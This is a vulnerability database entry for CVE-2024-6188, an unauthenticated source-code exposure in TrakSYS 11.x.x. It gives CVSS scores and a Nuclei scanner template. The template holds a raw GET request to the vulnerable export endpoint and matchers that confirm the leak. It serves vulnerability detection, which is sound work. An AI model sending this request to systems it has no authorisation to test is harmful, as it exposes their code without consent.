Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-6188
HistoryJul 08, 2024 - 10:44 p.m.

TrakSYS 11.x.x - Sensitive Data Exposure

2024-07-0822:44:30
ProjectDiscovery
github.com
11
traksys
sensitive data exposure
parsec automation
remote attackers
export
source code
cve-2024-6188
idor
information leak

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS4

6.9

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

28.8%

A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
id: CVE-2024-6188

info:
  name: TrakSYS 11.x.x - Sensitive Data Exposure
  author: securityforeveryone
  severity: medium
  description: |
    A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
  impact: An attacker is able to export the source code of the pages without having any credentials to access the application.
  reference:
    - https://kiwiyumi.com/post/tracksys-export-source-code/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6188
    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188
    - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188
  metadata:
    verified: true
    max-request: 1
    vendor: parsec-automation
    product: tracksys
  tags: cve,cve2024,traksys,idor,info-leak

http:
  - raw:
      - |
        GET /TS/export/pagedefinition?ID=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'TrakSYS Version'
          - 'Name'
          - 'Altname'
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b253a5a98a7432b44402719cf5070ea48a46f736dd935a3d191850571d8ee09502204dbe17d2cfedb94c6e00365e24ceab71bea2bc0076eaafda23b18aabc7585dab:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS4

6.9

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

28.8%

Related for NUCLEI:CVE-2024-6188